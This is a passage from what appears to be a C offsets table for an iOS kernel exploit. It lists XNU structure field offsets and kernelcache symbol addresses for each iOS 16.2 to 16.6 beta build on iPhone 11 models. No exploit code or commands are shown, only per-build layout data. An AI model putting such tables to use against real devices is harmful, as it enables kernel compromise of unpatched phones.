.kernelcache__gPhysSize = 0xfffffff00794fed0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00794e0a8, .kernelcache__perfmon_devices = 0xfffffff00a46b4f0, .kernelcache__perfmon_dev_open = 0xfffffff007efb3c8, .kernelcache__ptov_table = 0xfffffff007903178, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a46a990, .kernelcache__vm_pages = 0xfffffff0078ffeb0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007902118, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a46a988, .kernelcache__vn_kqfilter = 0xfffffff007f49f7c, }, // iOS 16.4.1 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:25 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8030", .build_version = "20E252", .device_id = "iPhone12,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a42d208, .kernelcache__gPhysBase = 0xfffffff00794fed0, .kernelcache__gPhysSize = 0xfffffff00794fed0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00794e0a8, .kernelcache__perfmon_devices = 0xfffffff00a46b4f0, .kernelcache__perfmon_dev_open = 0xfffffff007efb3c8, .kernelcache__ptov_table = 0xfffffff007903178, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a46a990, .kernelcache__vm_pages = 0xfffffff0078ffeb0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007902118, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a46a988, .kernelcache__vn_kqfilter = 0xfffffff007f49f7c, }, // iOS 16.5 // { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:28 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8030", .build_version = "20F66", .device_id = "iPhone12,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a435288, .kernelcache__gPhysBase = 0xfffffff007950010, .kernelcache__gPhysSize = 0xfffffff007950010 + 0x8, .kernelcache__gVirtBase = 0xfffffff00794e1e8, .kernelcache__perfmon_devices = 0xfffffff00a4734f0, .kernelcache__perfmon_dev_open = 0xfffffff007efb5d0, .kernelcache__ptov_table = 0xfffffff007903178, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a472990, .kernelcache__vm_pages = 0xfffffff0078ffeb0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007902118, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a472988, .kernelcache__vn_kqfilter = 0xfffffff007f4a41c, }, //iOS 16.6 beta 1 // { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:02 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8030", .build_version = "20G5026e", .device_id = "iPhone12,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a4c9ab0, .kernelcache__gPhysBase = 0xfffffff0079641b8, .kernelcache__gPhysSize = 0xfffffff0079641b8 + 0x8, .kernelcache__gVirtBase = 0xfffffff007962370, .kernelcache__perfmon_devices = 0xfffffff00a509520, .kernelcache__perfmon_dev_open = 0xfffffff007f1bd78, .kernelcache__ptov_table = 0xfffffff0079179b8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a508910, .kernelcache__vm_pages = 0xfffffff007914100, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007916958, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a508908, .kernelcache__vn_kqfilter = 0xfffffff007f6a588, }, // End iPhone 11 Pro Max // // Start iPhone 11 // // iOS 16.2 // { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:54 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8030", .build_version = "20C65", .device_id = "iPhone12,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a359178, .kernelcache__gPhysBase = 0xfffffff00786fb98, .kernelcache__gPhysSize = 0xfffffff00786fb98 + 0x8, .kernelcache__gVirtBase = 0xfffffff00786dd78, .kernelcache__perfmon_devices = 0xfffffff00a394370, .kernelcache__perfmon_dev_open = 0xfffffff007ed4bd8, .kernelcache__ptov_table = 0xfffffff007823260, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a393800, .kernelcache__vm_pages = 0xfffffff007820088, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007822210, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3937f8, .kernelcache__vn_kqfilter = 0xfffffff007f26f14, }, // iOS 16.3 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:00 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8030", .build_version = "20D47", .device_id = "iPhone12,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a35d178, .kernelcache__gPhysBase = 0xfffffff00786fc80, .kernelcache__gPhysSize = 0xfffffff00786fc80 + 0x8, .kernelcache__gVirtBase = 0xfffffff00786de60, .kernelcache__perfmon_devices = 0xfffffff00a398370, .kernelcache__perfmon_dev_open = 0xfffffff007ed8be8, .kernelcache__ptov_table = 0xfffffff0078232a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a397800, .kernelcache__vm_pages = 0xfffffff0078200c8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007822250, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3977f8, .kernelcache__vn_kqfilter = 0xfffffff007f2af14, }, // iOS 16.3.1 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:00 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8030", .build_version = "20D67", .device_id = "iPhone12,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a35d178, .kernelcache__gPhysBase = 0xfffffff00786fc80, .kernelcache__gPhysSize = 0xfffffff00786fc80 + 0x8, .kernelcache__gVirtBase = 0xfffffff00786de60, .kernelcache__perfmon_devices = 0xfffffff00a398370, .kernelcache__perfmon_dev_open = 0xfffffff007ed8be8, .kernelcache__ptov_table = 0xfffffff0078232a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a397800, .kernelcache__vm_pages = 0xfffffff0078200c8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007822250, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3977f8, .kernelcache__vn_kqfilter = 0xfffffff007f2af14, }, // iOS 16.4 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:25 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8030", .build_version = "20E247", .device_id = "iPhone12,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a425208, .kernelcache__gPhysBase = 0xfffffff00794bed0, .kernelcache__gPhysSize = 0xfffffff00794bed0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00794a0a8, .kernelcache__perfmon_devices = 0xfffffff00a4634f0, .kernelcache__perfmon_dev_open = 0xfffffff007ef73c8, .kernelcache__ptov_table = 0xfffffff0078ff178, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a462990, .kernelcache__vm_pages = 0xfffffff0078fbeb0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078fe118, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a462988, .kernelcache__vn_kqfilter = 0xfffffff007f45f7c, }, // iOS 16.4.1 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:25 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8030", .build_version = "20E252", .device_id = "iPhone12,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a425208, .kernelcache__gPhysBase = 0xfffffff00794bed0, .kernelcache__gPhysSize = 0xfffffff00794bed0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00794a0a8, .kernelcache__perfmon_devices = 0xfffffff00a4634f0, .kernelcache__perfmon_dev_open = 0xfffffff007ef73c8, .kernelcache__ptov_table = 0xfffffff0078ff178, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a462990, .kernelcache__vm_pages = 0xfffffff0078fbeb0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078fe118, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a462988, .kernelcache__vn_kqfilter = 0xfffffff007f45f7c, }, // iOS 16.5 // { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:28 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8030", .build_version = "20F66", .device_id = "iPhone12,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 